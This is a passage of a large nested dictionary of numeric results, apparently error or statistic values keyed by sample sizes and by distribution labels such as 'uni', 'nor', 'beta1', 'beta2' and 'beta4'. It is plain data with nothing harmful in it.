0.14309653474101058, 'beta1': 0.09813249384450734, 'beta2': 0.17913524248375756, 'beta4': 0.08268049428370317}, 300: {'uni': 0.10923381308894958, 'nor': 0.15222716073399284, 'beta1': 0.11266368232034613, 'beta2': 0.1854635291641431, 'beta4': 0.09615779121211337}, 200: {'uni': 0.1363804725778009, 'nor': 0.17267694139649953, 'beta1': 0.13582009258399352, 'beta2': 0.19574314248677793, 'beta4': 0.1179637069833459}, 150: {'uni': 0.15887161022374907, 'nor': 0.18432817945104918, 'beta1': 0.16199472287112165, 'beta2': 0.21773658228591058, 'beta4': 0.14255486238615406}, 100: {'uni': 0.19262944923823816, 'nor': 0.21456176331780907, 'beta1': 0.19248127836354945, 'beta2': 0.249444130339123, 'beta4': 0.17499830511234898}, 75: {'uni': 0.22633597240156172, 'nor': 0.24116115592351106, 'beta1': 0.2161337337848539, 'beta2': 0.2609793421406472, 'beta4': 0.21072808513003066}, 50: {'uni': 0.2644800919231039, 'nor': 0.297735358593486, 'beta1': 0.27231937439921694, 'beta2': 0.3102197722435756, 'beta4': 0.25709639846200694}, 30: {'uni': 0.34625180846494763, 'nor': 0.35746737858146227, 'beta1': 0.354486005184482, 'beta2': 0.38683476647160936, 'beta4': 0.33170959441086517}, 20: {'uni': 0.4208903869972874, 'nor': 0.43552557162203065, 'beta1': 0.4221261305003158, 'beta2': 0.43662638995711245, 'beta4': 0.41463291398406665}, 10: {'uni': 0.5741138916139755, 'nor': 0.5851120398678165, 'beta1': 0.5841496889181017, 'beta2': 0.5934894074324251, 'beta4': 0.5863482781018794}}, 150: {1000: {'uni': 0.061581541028080056, 'nor': 0.13381363846898142, 'beta1': 0.06128042761918895, 'beta2': 0.1708966560232832, 'beta4': 0.04741420430861787}, 750: {'uni': 0.07217513645135509, 'nor': 0.1419413060812098, 'beta1': 0.07273928089814014, 'beta2': 0.1704412808052873, 'beta4': 0.05574805904383956}, 500: {'uni': 0.08676298708174202, 'nor': 0.14572604267188155, 'beta1': 0.08647759105067054, 'beta2': 0.18242632197904074, 'beta4': 0.068983137151813}, 400: {'uni': 0.1037742765004267, 'nor': 0.15223240381779424, 'beta1': 0.09518076159694533, 'beta2': 0.18643202068616882, 'beta4': 0.07923549680449954}, 300: {'uni': 0.11129074028405522, 'nor': 0.16268462117490684, 'beta1': 0.11075585275192301, 'beta2': 0.19821370441263542, 'beta4': 0.0912523876738719}, 200: {'uni': 0.14156920331099243, 'nor': 0.183250873096864, 'beta1': 0.13716604234880148, 'beta2': 0.2130216482290011, 'beta4': 0.11611656331446252}, 150: {'uni': 0.15991456155699446, 'nor': 0.19972632801083756, 'beta1': 0.1591623711263259, 'beta2': 0.22363803209488897, 'beta4': 0.14252665232189032}, 100: {'uni': 0.19390376852650276, 'nor': 0.2201533899028501, 'beta1': 0.18839789593786516, 'beta2': 0.24896472297863287, 'beta4': 0.1770303243572896}, 75: {'uni': 0.22864723992828329, 'nor': 0.25517195260709286, 'beta1': 0.2223328847363084, 'beta2': 0.2733216821263156, 'beta4': 0.20304334588696407}, 50: {'uni': 0.27905130659334465, 'nor': 0.29278280274240853, 'beta1': 0.27019362750168496, 'beta2': 0.31309475544534465, 'beta4': 0.2559990955320065}, 30: {'uni': 0.3425789585849717, 'nor': 0.37265663059965937, 'beta1': 0.3464581721664352, 'beta2': 0.3754015070826656, 'beta4': 0.33959173277428956}, 20: {'uni': 0.413086515337455, 'nor': 0.43965945028509446, 'beta1': 0.418736079933717, 'beta2': 0.4501591234804877, 'beta4': 0.4084124782048353}, 10: {'uni': 0.5706418060679364, 'nor': 0.6001645167142622, 'beta1': 0.583725351797004, 'beta2': 0.6040594457979085, 'beta4': 0.5764634218983131}}, 100: {1000: {'uni': 0.06313216417743228, 'nor': 0.15511920982718863, 'beta1': 0.06071848963460641, 'beta2': 0.1852927465697436, 'beta4': 0.046839153362001285}, 750: {'uni': 0.07060453599906669, 'nor': 0.15967621914568836, 'beta1': 0.07229601201250235, 'beta2': 0.182858927441081, 'beta4': 0.055455267837987376}, 500: {'uni': 0.08818052394211406, 'nor': 0.16873532933540125, 'beta1': 0.0868958489599253, 'beta2': 0.1975968138053138, 'beta4': 0.06905730331083232}, 400: {'uni': 0.09814516465678552, 'nor': 0.1712550619838623, 'beta1': 0.09386098643015672, 'beta2': 0.20350183151319534, 'beta4': 0.0760007184942118}, 300: {'uni': 0.11258064110576615, 'nor': 0.1861127284054659, 'beta1': 0.11092868379936521, 'beta2': 0.20785761241672152, 'beta4': 0.09103330358097073}, 200: {'uni': 0.1420062149021436, 'nor': 0.2039189542914086, 'beta1': 0.13490696398941743, 'beta2': 0.21950847474619883, 'beta4': 0.11479778662604484}, 150: {'uni': 0.15523966003490114, 'nor': 0.21793931900467456, 'beta1': 0.15561530770905507, 'beta2': 0.2357875854144415, 'beta4': 0.13546635253677153}, 100: {'uni': 0.19239990647813998, 'nor': 0.2438993981647118, 'beta1': 0.1922366330056719, 'beta2': 0.2604761303669994, 'beta4': 0.1659451762115397}, 75: {'uni': 0.22461916118542863, 'nor': 0.27058774539802555, 'beta1': 0.22230160922578357, 'beta2': 0.2911017312827485, 'beta4': 0.19346309234954379}, 50: {'uni': 0.27074554119725264, 'nor': 0.30742771165485183, 'beta1': 0.27244230243937856, 'beta2': 0.32070239362920566, 'beta4': 0.24948280857988892}, 30: {'uni': 0.35244357964247014, 'nor': 0.36981016362792096, 'beta1': 0.34898633566867193, 'beta2': 0.38698154490065484, 'beta4': 0.3248812590836839}, 20: {'uni': 0.4240679624088838, 'nor': 0.45938820409137887, 'beta1': 0.43245353617429105, 'beta2': 0.44501946591388836, 'beta4': 0.40725305375468834}, 10: {'uni': 0.5815683982350479, 'nor': 0.5902866349338, 'beta1': 0.5747202522025672, 'beta2': 0.6059676751094598, 'beta4': 0.5690438100022845}}, 75: {1000: {'uni': 0.06343097776077222, 'nor': 0.18225818491306756, 'beta1': 0.06089929840604752, 'beta2': 0.1921539386252139, 'beta4': 0.04668630013644415}, 750: {'uni': 0.07093914009247082, 'nor': 0.18331684154766742, 'beta1': 0.07107432732560648, 'beta2': 0.19880651185771303, 'beta4': 0.05348844967825772}, 500: {'uni': 0.08795472881903066, 'nor': 0.18823200655948724, 'beta1': 0.08586213142784449, 'beta2': 0.20523208991902597, 'beta4': 0.0679290798965112}, 400: {'uni': 0.09712081890314317, 'nor': 0.19232649259506907, 'beta1': 0.09572130547403512, 'beta2': 0.20602199644821684, 'beta4': 0.07606892412187635}, 300: {'uni': 0.11089260364623976, 'nor': 0.20098062324678168, 'beta1': 0.11308804326671185, 'beta2': 0.21785952031115308, 'beta4': 0.08679599809855915}, 200: {'uni': 0.13809595295884958, 'nor': 0.21558504424344116, 'beta1': 0.13648211163259177, 'beta2': 0.2240794200909899, 'beta4': 0.11204654007283227}, 150: {'uni': 0.15618647125937568, 'nor': 0.22837035534828887, 'beta1': 0.16415374893470858, 'beta2': 0.24619708299092824, 'beta4': 0.1306985642616213}, 100: {'uni': 0.19101450956719734, 'nor': 0.25931455723118757, 'beta1': 0.1906189266503715, 'beta2': 0.25867729487710983, 'beta4': 0.16519992510196357}, 75: {'uni': 0.2248743837036717, 'nor': 0.284057154634835, 'beta1': 0.2214601276761196, 'beta2': 0.2968579661443965, 'beta4': 0.19826666120956982}, 50: {'uni': 0.2662431911648192, 'nor': 0.322043709935765, 'beta1': 0.2744451907446851, 'beta2': 0.32350434821909946, 'beta4': 0.23404149031621968}, 30: {'uni': 0.3413757219051654, 'nor': 0.38244337953851876, 'beta1': 0.33835049788177923, 'beta2': 0.38719686508504525, 'beta4': 0.32727681475974785}, 20: {'uni': 0.4194033788361589, 'nor': 0.4577741598526479, 'beta1': 0.42074777341644765, 'beta2': 0.459091804977372, 'beta4': 0.396462204973229}, 10: {'uni': 0.5907006598340476, 'nor': 0.6052762697560137, 'beta1': 0.5799457230505303, 'beta2': 0.5967731695513359, 'beta4': 0.5567664226243562}}, 50: {1000: {'uni': 0.06289662081877767, 'nor': 0.21209732127933695, 'beta1': 0.06328219460040524, 'beta2': 0.21952990496616331, 'beta4': 0.04652359653778593}, 750: {'uni': 0.07302743229171516, 'nor': 0.214754896945754, 'beta1': 0.07193093639114312, 'beta2': 0.22024404018125943, 'beta4': 0.05415327509547532}, 500: {'uni': 0.08893676490117702, 'nor': 0.22572655912609974, 'beta1': 0.08580989277541334, 'beta2': 0.22230227225554544, 'beta4': 0.06673468929448162}, 400: {'uni': 0.09924243273175976, 'nor': 0.21704650146565524, 'beta1': 0.09913193004467818, 'beta2': 0.2230390821061281, 'beta4': 0.07605580382200511}, 300: {'uni': 0.11166832041438324, 'nor': 0.2316018695710197, 'beta1': 0.11095163241473041, 'beta2': 0.22865927465012947, 'beta4': 0.08685797923558519}, 200: {'uni': 0.13771685172695608, 'nor': 0.2444927799351998, 'beta1': 0.13618389281423876, 'beta2': 0.2476456752305473, 'beta4': 0.11083026707940419}, 150: {'uni': 0.16377774164329523, 'nor': 0.26636154033277937, 'beta1': 0.15952097465539494, 'beta2': 0.2642089480719845, 'beta4': 0.12746484906871963}, 100: {'uni': 0.19907093430084438, 'nor': 0.2881344316533607, 'beta1': 0.19083482136604094, 'beta2': 0.2795457182953769, 'beta4': 0.16290169574365254}, 75: {'uni': 0.22574036421615706, 'nor': 0.2945057282847927, 'beta1': 0.22099290833697738, 'beta2': 0.3125623487295235, 'beta4': 0.18773801878190854}, 50: {'uni': 0.26854352815958205, 'nor': 0.34022111278024636, 'beta1': 0.26708927188428466, 'beta2': 0.33081642137592326, 'beta4': 0.2312879966418534}, 30: {'uni': 0.34609583514062453, 'nor': 0.3974340756558435, 'beta1': 0.35262530240286505, 'beta2': 0.40184913128104555, 'beta4': 0.31424089478942174}, 20: {'uni': 0.42087262066086245, 'nor': 0.4723782826353492, 'beta1': 0.40877860835331126, 'beta2': 0.4688509117448108, 'beta4': 0.3944964916008954}, 10: {'uni': 0.5876869576804664, 'nor': 0.6147903811081372, 'beta1': 0.5755066117906042, 'beta2': 0.6002859122286868, 'beta4': 0.5619966062890571}}, 30: {1000: {'uni': 0.06948652094585245, 'nor': 0.2718705530055696, 'beta1': 0.06121483805914607, 'beta2': 0.24043460865095967, 'beta4': 0.04627664402531112}, 750: {'uni': 0.07850498128590577, 'nor': 0.2757982454491844, 'beta1': 0.07241579137645177, 'beta2': 0.23983322004672003, 'beta4': 0.05332068388106076}, 500: {'uni': 0.09105158068430297, 'nor': 0.28241113398116124, 'beta1': 0.08799353765963347, 'beta2': 0.24766224893806577, 'beta4': 0.06765893263671346}, 400: {'uni': 0.10259273534636915, 'nor': 0.2792924843341777, 'beta1': 0.09836004244107166, 'beta2': 0.2550995041680404, 'beta4': 0.07407712496960317}, 300: {'uni': 0.11391452466229124, 'nor': 0.2807189754417535, 'beta1': 0.10984101411545055, 'beta2': 0.26044799268369856, 'beta4': 0.08443610887402886}, 200: {'uni': 0.14196809341696937, 'nor': 0.30755809164972786, 'beta1': 0.134610786707702, 'beta2': 0.2728609545630691, 'beta4': 0.10722586308476961}, 150: {'uni': 0.16419172956318423, 'nor': 0.3146162122023685, 'beta1': 0.16286335903122795, 'beta2': 0.2776012731538803, 'beta4': 0.12523292823182686}, 100: {'uni': 0.1960001100263563, 'nor': 0.33279373396299217, 'beta1': 0.19130478182156138, 'beta2': 0.3054148396914321, 'beta4': 0.14912466816038042}, 75: {'uni': 0.2185677970786405, 'nor': 0.34709466522087906, 'beta1': 0.22127741653506036, 'beta2': 0.3201758535953785, 'beta4': 0.1777525903209297}, 50: {'uni': 0.270413471015134, 'nor': 0.3892831769925561, 'beta1': 0.2761867140439328, 'beta2': 0.35340657017600746, 'beta4': 0.22674679543504245}, 30: {'uni': 0.3355166504892189, 'nor': 0.44161834679911804, 'beta1': 0.3401068225433252, 'beta2': 0.4102852253271071, 'beta4': 0.3009578630318522}, 20: {'uni': 0.4262038800117972, 'nor': 0.5086511058873824, 'beta1': 0.41934711626787075, 'beta2': 0.4781819621838607, 'beta4': 0.3804323693448428}, 10: {'uni': 0.5575440699348245, 'nor': 0.6393871170053329, 'beta1': 0.5743956360209639, 'beta2': 0.6106643197230515, 'beta4': 0.55155845441342}}, 20: {1000: {'uni': 0.07536262505840652, 'nor': 0.325103001431867, 'beta1': 0.06343013362012273, 'beta2': 0.2629182940928082, 'beta4': 0.0460977432301721}, 750: {'uni': 0.0829470027542002, 'nor': 0.32291554964370983, 'beta1': 0.07116730251499337, 'beta2': 0.2659412807353341, 'beta4': 0.05406687577763064}, 500: {'uni': 0.09694368519188473, 'nor': 0.3349376153106337, 'beta1': 0.08654293972580873, 'beta2': 0.2723939674154165, 'beta4': 0.06538298069380022}, 400: {'uni': 0.10627426651824678, 'nor': 0.3429154491873649, 'beta1': 0.09562315388400733, 'beta2': 0.274633662575442, 'beta4': 0.07380231095120421}, 300: {'uni': 0.12121567109701081, 'nor': 0.34972582827606147, 'beta1': 0.1103611782866849, 'beta2': 0.2862428547095127, 'beta4': 0.08272204817151216}, 200: {'uni': 0.14071639130023078, 'nor': 0.35855620239382735, 'beta1': 0.13776555190056528, 'beta2': 0.29720835544613766, 'beta4': 0.10338502388302273}, 150: {'uni': 0.1674293069624112, 'nor': 0.3688691322877407, 'beta1': 0.1527138911941961, 'beta2': 0.3059024770592428, 'beta4': 0.11972445069338061}, 100: {'uni': 0.1931249598575589, 'nor': 0.3948780972148766, 'beta1': 0.19347436784743782, 'beta2': 0.3310703246707575, 'beta4': 0.15095159670353941}, 75: {'uni': 0.22271809589488334, 'nor': 0.3953558256807349, 'beta1': 0.22024905763478564, 'beta2': 0.34639607563218006, 'beta4': 0.1733242565090895}, 50: {'uni': 0.2692139861904778, 'nor': 0.44176675584445435, 'beta1': 0.2681610154192196, 'beta2': 0.3688995176021794, 'beta4': 0.2199893429283878}, 30: {'uni': 0.34613135894553704, 'nor': 0.48601158747952417, 'beta1': 0.3526353889844575, 'beta2': 0.41994055226884575, 'beta4': 0.3022745779371493}, 20: {'uni': 0.4142621100975231, 'nor': 0.5324753066803931, 'beta1': 0.42017567922341303, 'beta2': 0.4983438571041758, 'beta4': 0.37087287301736277}, 10: {'uni': 0.5815509625778061, 'nor': 0.6599263857098001, 'beta1': 0.5848662195260658, 'beta2': 0.6277074211809401, 'beta4': 0.536410316354095}}, 10: {1000: {'uni': 0.10593932477847545, 'nor': 0.47843393031925197, 'beta1': 0.09118434879484168, 'beta2': 0.31039960784712656, 'beta4': 0.04571662748262856}, 750: {'uni': 0.10873654868800559, 'nor': 0.4828796783832185, 'beta1': 0.09123008540154381, 'beta2': 0.32058869843201154, 'beta4': 0.05459270006386302}, 500: {'uni': 0.1218524317529881, 'nor': 0.47457693822012165, 'beta1': 0.09190111833494254, 'beta2': 0.32548160013208494, 'beta4': 0.06444599187085187}, 400: {'uni': 0.1291175399330874, 'nor': 0.48422996573767696, 'beta1': 0.09770420769932464, 'beta2': 0.3207957215249058, 'beta4': 0.07182128251456826}, 300: {'uni': 0.13986394783048994, 'nor': 0.4936681503491342, 'beta1': 0.11639095276280087, 'beta2': 0.3302723438968203, 'beta4': 0.08350546988796351}, 200: {'uni': 0.15641204249228619, 'nor': 0.49091789466629215, 'beta1': 0.1384070227155504, 'beta2': 0.33428367370964873, 'beta4': 0.10341259876194087}, 150: {'uni': 0.1795234939504045, 'nor': 0.5105288108171256, 'beta1': 0.15598497704645214, 'beta2': 0.3493488175884878, 'beta4': 0.121233871216612}, 100: {'uni': 0.20239443979403965, 'nor': 0.5084179657882892, 'beta1': 0.19184385711254798, 'beta2': 0.3677119127424313, 'beta4': 0.14277278677201605}, 75: {'uni': 0.23336879708678648, 'nor': 0.5372531064368602, 'beta1': 0.21661827263964478, 'beta2': 0.38626444266491533, 'beta4': 0.1731449508683547}, 50: {'uni': 0.27958310612315557, 'nor': 0.5493723312942567, 'beta1': 0.27176323053080753, 'beta2': 0.4024758607629697, 'beta4': 0.21208860379265493}, 30: {'uni': 0.35159835409526013, 'nor': 0.6014446437219039, 'beta1': 0.3425500943598077, 'beta2': 0.4384712270988477, 'beta4': 0.27735321868152857}, 20: {'uni': 0.42536479079788436, 'nor': 0.638297428768129, 'beta1': 0.41601242728257026, 'beta2': 0.4962070327728678, 'beta4': 0.35012615099378874}, 10: {'uni': 0.5790001552629874, 'nor': 0.7766658813569549, 'beta1': 0.5698438923280504, 'beta2': 0.6494949780401632, 'beta4': 0.5099159037878125}}}, 0.005: {1000: {1000: {'uni': 0.054309210293536636, 'nor': 0.06770710838466354, 'beta1': 0.05394964156179005, 'beta2': 0.10851637362805477, 'beta4': 0.04843440132315624}, 750: {'uni': 0.06322911372839468, 'nor': 0.0745551173670449, 'beta1': 0.06287867060893981, 'beta2': 0.11461799139150997, 'beta4': 0.05586943360634522}, 500: {'uni': 0.07765031214887835, 'nor': 0.08611027590190884, 'beta1': 0.07713692782616743, 'beta2': 0.11964611258405178, 'beta4': 0.07119677640670702}, 400: {'uni': 0.0854335124620158, 'nor': 0.09548666720165888, 'beta1': 0.08533596488740514, 'beta2': 0.12715285235100549, 'beta4': 0.07976243865103633}, 300: {'uni': 0.09989789753529099, 'nor': 0.10770019723728286, 'beta1': 0.10033186368236657, 'beta2': 0.13419229911795216, 'beta4': 0.09411115678315363}, 200: {'uni': 0.12127892617742153, 'nor': 0.12720442210497968, 'beta1': 0.12233003012147065, 'beta2': 0.15172099760163998, 'beta4': 0.11632447574237281}, 150: {'uni': 0.14013211406544834, 'nor': 0.14827174402121335, 'beta1': 0.13915131007977077, 'beta2': 0.1658270971393584, 'beta4': 0.13647642747887956}, 100: {'uni': 0.16997690980859004, 'nor': 0.17670091885771855, 'beta1': 0.16973161594489053, 'beta2': 0.19345282120387458, 'beta4': 0.1661007523523409}, 75: {'uni': 0.19932581091265966, 'nor': 0.2027740177880774, 'beta1': 0.19612208261591985, 'beta2': 0.21702643923996, 'beta4': 0.19530006216709206}, 50: {'uni': 0.2468910799274996, 'nor': 0.24339758057452598, 'beta1': 0.24033137076480987, 'beta2': 0.252320775622887, 'beta4': 0.2366355896057103}, 30: {'uni': 0.305496981057798, 'nor': 0.3093061642043575, 'beta1': 0.3019112459095068, 'beta2': 0.32031294166562413, 'beta4': 0.3061483505104996}, 20: {'uni': 0.3717287585662501, 'nor': 0.37675350444050804, 'beta1': 0.37247628349892237, 'beta2': 0.37673982805892064, 'beta4': 0.3751343167170222}, 10: {'uni': 0.521167289093317, 'nor': 0.518263035063083, 'beta1': 0.5175638164552467, 'beta2': 0.5206573949182801, 'beta4': 0.5201760853486797}}, 750: {1000: {'uni': 0.055164667777315046, 'nor': 0.07131664732480447, 'beta1': 0.05461015638241973, 'beta2': 0.10747658269785487, 'beta4': 0.04694525214323675}, 750: {'uni': 0.06303342152086694, 'nor': 0.07763029700247803, 'beta1': 0.06322330711203825, 'beta2': 0.11262414947388338, 'beta4': 0.05532984777518732}, 500: {'uni': 0.07669845695030969, 'nor': 0.09063047612797143, 'beta1': 0.07696921230024523, 'beta2': 0.11983272103386594, 'beta4': 0.06956147386680006}, 400: {'uni': 0.08611488267094475, 'nor': 0.0974713367565152, 'beta1': 0.08478041441928014, 'beta2': 0.12731656056450652, 'beta4': 0.07991489810774749}, 300: {'uni': 0.09985154726648465, 'nor': 0.111169848481041, 'beta1': 0.09777711208026346, 'beta2': 0.13531396869038226, 'beta4': 0.09119975402687397}, 200: {'uni': 0.1211085307144601, 'nor': 0.12968999402436032, 'beta1': 0.12091197897231892, 'beta2': 0.15150314994539527, 'beta4': 0.1155329295397578}, 150: {'uni': 0.14070726556031377, 'nor': 0.14567076992622047, 'beta1': 0.13814881873714974, 'beta2': 0.16827021141072973, 'beta4': 0.13447433397080932}, 100: {'uni': 0.17147077335738992, 'nor': 0.17723697577268377, 'beta1': 0.1701072384695923, 'beta2': 0.19228744913609386, 'beta4': 0.16650131522038414}, 75: {'uni': 0.19697585503036097, 'nor': 0.2068795811630726, 'beta1': 0.19570918631380896, 'beta2': 0.21738847323087096, 'beta4': 0.19446732054460464}, 50: {'uni': 0.23830528070048534, 'nor': 0.24112746544721542, 'beta1': 0.24024370353633562, 'beta2': 0.25617890898562745, 'beta4': 0.2374860040189496}, 30: {'uni': 0.3047940690571652, 'nor': 0.3117736625777223, 'beta1': 0.3075351731550439, 'beta2': 0.3272819694873685, 'beta4': 0.3075370456855608}, 20: {'uni': 0.38162187029118155, 'nor': 0.3738685108858104, 'beta1': 0.372463189312913, 'beta2': 0.3868272294258014, 'beta4': 0.37379486160733993}, 10: {'uni': 0.5258444160016277, 'nor': 0.5215991214259363, 'beta1': 0.517833660238219, 'beta2': 0.5255924381659314, 'beta4': 0.514420238437874}}, 500: {1000: {'uni': 0.05462849470497394, 'nor': 0.07814858053006213, 'beta1': 0.05439078035500816, 'beta2': 0.11786529274785795, 'beta4': 0.04512974256857838}, 750: {'uni': 0.0630164202653, 'nor': 0.08598140708093582, 'beta1': 0.06280717820250309, 'beta2': 0.12253896527927555, 'beta4': 0.05327711159917553}, 500: {'uni': 0.07718768079866062, 'nor': 0.09473087596860513, 'beta1': 0.07771672820740799, 'beta2': 0.13066189974731812, 'beta4': 0.06792781655042113}, 400: {'uni': 0.08727900239437064, 'nor': 0.1031046602693152, 'beta1': 0.08587201246728926, 'beta2': 0.13750278345580969, 'beta4': 0.07641943558033681}, 300: {'uni': 0.09735499483435273, 'nor': 0.11238965365776238, 'beta1': 0.10105981918034712, 'beta2': 0.1429736395904797, 'beta4': 0.09020195977248413}, 200: {'uni': 0.12317763693332873, 'nor': 0.13530119957403747, 'beta1': 0.11942019256586084, 'beta2': 0.16298780836084303, 'beta4': 0.11456409066249257}, 150: {'uni': 0.1407614431099966, 'nor': 0.15131961478693112, 'beta1': 0.14148625143732174, 'beta2': 0.17679433711198078, 'beta4': 0.13076961122199615}, 100: {'uni': 0.1713862765989115, 'nor': 0.18173933803266007, 'beta1': 0.17107023194956172, 'beta2': 0.20004435790715813, 'beta4': 0.16667447549743752}, 75: {'uni': 0.19683034656665033, 'nor': 0.20562378844499862, 'beta1': 0.20171095440300613, 'beta2': 0.2228278954167986, 'beta4': 0.18979851902028033}, 50: {'uni': 0.24134168665013422, 'nor': 0.25303094047370045, 'beta1': 0.2405937821161408, 'beta2': 0.25814476480505677, 'beta4': 0.23379201812238004}, 30: {'uni': 0.30572219759341496, 'nor': 0.3138147539731113, 'beta1': 0.31220387612792333, 'beta2': 0.32746285385932816, 'beta4': 0.3068274256947208}, 20: {'uni': 0.3766240108372487, 'nor': 0.3794127882935937, 'beta1': 0.3687031808183018, 'beta2': 0.3835817175154338, 'beta4': 0.36538004912059097}, 10: {'uni': 0.5172842691254594, 'nor': 0.5231665455873322, 'beta1': 0.5189693525633482, 'beta2': 0.5311363287437341, 'beta4': 0.5139644087094528}}, 400: {1000: {'uni': 0.05437173202096113, 'nor': 0.08305972110203474, 'beta1': 0.054735721524527214, 'beta2': 0.11691664940089053, 'beta4': 0.044764759336513305}, 750: {'uni': 0.06296519099843445, 'nor': 0.08805615903403163, 'beta1': 0.06272026286720017, 'beta2': 0.1210806824585442, 'beta4': 0.052896515060130544}, 500: {'uni': 0.07760492127335133, 'nor': 0.0995661105004016, 'beta1': 0.07684496802411883, 'beta2': 0.12802441585532842, 'beta4': 0.06722957912133365}, 400: {'uni': 0.08525797685642766, 'nor': 0.1059372885433747, 'beta1': 0.08619988724777161, 'beta2': 0.13431886591110576, 'beta4': 0.07539217174214996}, 300: {'uni': 0.0982990668151138, 'nor': 0.11634268888448995, 'beta1': 0.09983116086197136, 'beta2': 0.14490484107113055, 'beta4': 0.08792653305842368}, 200: {'uni': 0.12203769639477358, 'nor': 0.13660314035918714, 'beta1': 0.12012838172596668, 'beta2': 0.15855457816365026, 'beta4': 0.11342497995414347}, 150: {'uni': 0.13994483228161086, 'nor': 0.15423137169373957, 'beta1': 0.14071121957348942, 'beta2': 0.1759524837742879, 'beta4': 0.12973842437014774}, 100: {'uni': 0.16998004751235896, 'nor': 0.18533997087586795, 'beta1': 0.17260069554339919, 'beta2': 0.20142524926231042, 'beta4': 0.16375622461186412}, 75: {'uni': 0.19919438048820443, 'nor': 0.20872180909907717, 'beta1': 0.19747443091888628, 'beta2': 0.22331606995046627, 'beta4': 0.18915187538619394}, 50: {'uni': 0.24260494503890717, 'nor': 0.2490837050424674, 'beta1': 0.24174431425141207, 'beta2': 0.26695113075708743, 'beta4': 0.23530080467269482}, 30: {'uni': 0.30678574020464666, 'nor': 0.3207642333511338, 'beta1': 0.30811715717135785, 'beta2': 0.3248044091864074, 'beta4': 0.3019272505018041}, 20: {'uni': 0.3754849973727803, 'nor': 0.3792312499409558, 'beta1': 0.3737894450702678, 'beta2': 0.39127103265108387, 'beta4': 0.3711738822600462}, 10: {'uni': 0.5138997823796634, 'nor': 0.5127905077842452, 'beta1': 0.5169043634953481, 'beta2': 0.5281055333295728, 'beta4': 0.5193863606893283}}, 300: {1000: {'uni': 0.054171219309968266, 'nor': 0.09149857715201964, 'beta1': 0.054967619265905765, 'beta2': 0.12328907814221546, 'beta4': 0.04422880083376829}, 750: {'uni': 0.06228069924407087, 'nor': 0.09672249810959854, 'beta1': 0.0633028218826393, 'beta2': 0.12865131475687186, 'beta4': 0.05215982023008059}, 500: {'uni': 0.07862740955308545, 'nor': 0.10538600209851101, 'beta1': 0.07634673776224471, 'beta2': 0.13579516304274086, 'beta4': 0.06570451083138404}, 400: {'uni': 0.08606522700190578, 'nor': 0.11159352035626091, 'beta1': 0.08637179271313189, 'beta2': 0.1427193158728336, 'beta4': 0.07325637093886234}, 300: {'uni': 0.09982270055761183, 'nor': 0.122758213601175, 'beta1': 0.09973780782522945, 'beta2': 0.15198003666478777, 'beta4': 0.08630423340788074}, 200: {'uni': 0.12190239561659899, 'nor': 0.14363241010985406, 'beta1': 0.1212028739293255, 'beta2': 0.16502734817092168, 'beta4': 0.10950972011591287}, 150: {'uni': 0.1417718900803699, 'nor': 0.1593838233572799, 'beta1': 0.14050415423056511, 'beta2': 0.17994840692557712, 'beta4': 0.12734797519473529}, 100: {'uni': 0.17071272759843154, 'nor': 0.18620924221751517, 'beta1': 0.1694943482147639, 'beta2': 0.2061617674979867, 'beta4': 0.15839016146732976}, 75: {'uni': 0.19584271511298973, 'nor': 0.2093370290072297, 'beta1': 0.19718572391483902, 'beta2': 0.23127370158834348, 'beta4': 0.18832549889256817}, 50: {'uni': 0.2373732051332261, 'nor': 0.2525943440552235, 'beta1': 0.24061212793870418, 'beta2': 0.26576036413576276, 'beta4': 0.23083689372432803}, 30: {'uni': 0.3100041602252892, 'nor': 0.3259233331503591, 'beta1': 0.3043992784905107, 'beta2': 0.32847104261195337, 'beta4': 0.2976093515050148}, 20: {'uni': 0.37875813326972396, 'nor': 0.38421934320745366, 'beta1': 0.36904579022730116, 'beta2': 0.39257091754456774, 'beta4': 0.3714918858680628}, 10: {'uni': 0.5256130005835765, 'nor': 0.5146313247332729, 'beta1': 0.5154354512884594, 'beta2': 0.5236551729483561, 'beta4': 0.5171483868755382}}, 200: {1000: {'uni': 0.054823062468771444, 'nor': 0.10237608718650248, 'beta1': 0.054913425269282445, 'beta2': 0.13753066984524742, 'beta4': 0.04306065777641055}, 750: {'uni': 0.06303781952610477, 'nor': 0.107566183991327, 'beta1': 0.06420595175095856, 'beta2': 0.14051764144651235, 'beta4': 0.05083566221768343}, 500: {'uni': 0.077773467688739, 'nor': 0.11742486043919942, 'beta1': 0.07700877908013115, 'beta2': 0.1511127593960866, 'beta4': 0.06280694981838986}, 400: {'uni': 0.08746277637091704, 'nor': 0.12365577953156803, 'beta1': 0.08541014292804638, 'beta2': 0.15608748317289656, 'beta4': 0.07176746331816469}, 300: {'uni': 0.09874368980037385, 'nor': 0.13279799940406578, 'beta1': 0.10063727053662885, 'beta2': 0.16469825347196948, 'beta4': 0.08447571374140178}, 200: {'uni': 0.12147398047991875, 'nor': 0.15113252491099077, 'beta1': 0.1200711704573576, 'beta2': 0.1773291927975813, 'beta4': 0.10795683062214101}, 150: {'uni': 0.1362385673420503, 'nor': 0.16821153015139878, 'beta1': 0.1413420271907294, 'beta2': 0.19069570391948212, 'beta4': 0.12371945303991366}, 100: {'uni': 0.17191169006549945, 'nor': 0.1915000329509956, 'beta1': 0.16877716420631123, 'beta2': 0.21536781735389232, 'beta4': 0.15634386366388436}, 75: {'uni': 0.19768216860175636, 'nor': 0.21811329268682084, 'beta1': 0.1944362202006149, 'beta2': 0.23468699165444767, 'beta4': 0.18438491874181984}, 50: {'uni': 0.24173902870459993, 'nor': 0.25892138695111544, 'beta1': 0.23935110326757852, 'beta2': 0.2736926533593288, 'beta4': 0.2305071196963152}, 30: {'uni': 0.3056290673196859, 'nor': 0.31961597063487057, 'beta1': 0.30685624740134015, 'beta2': 0.3314946124079916, 'beta4': 0.2962690398405605}, 20: {'uni': 0.37503602220656485, 'nor': 0.38582014314039126, 'beta1': 0.37033940847339836, 'beta2': 0.394855889549228, 'beta4': 0.3632513574058299}, 10: {'uni': 0.5219475742101427, 'nor': 0.5273558177210325, 'beta1': 0.5179563071106704, 'beta2': 0.5223280464261697, 'beta4': 0.508754397926185}}, 150: {1000: {'uni': 0.05497081944724275, 'nor': 0.11293866805236763, 'beta1': 0.054515515093092715, 'beta2': 0.14887668708582957, 'beta4': 0.0423526366673494}, 750: {'uni': 0.06272727255199112, 'nor': 0.11935685094462867, 'beta1': 0.06302161535014611, 'beta2': 0.15422727456751978, 'beta4': 0.05010677582182044}, 500: {'uni': 0.07783890547759603, 'nor': 0.12892780402185094, 'beta1': 0.07679900717257704, 'beta2': 0.1584491203937134, 'beta4': 0.06222703641019131}, 400: {'uni': 0.08619692493811398, 'nor': 0.13460267386562202, 'beta1': 0.08498682818675518, 'beta2': 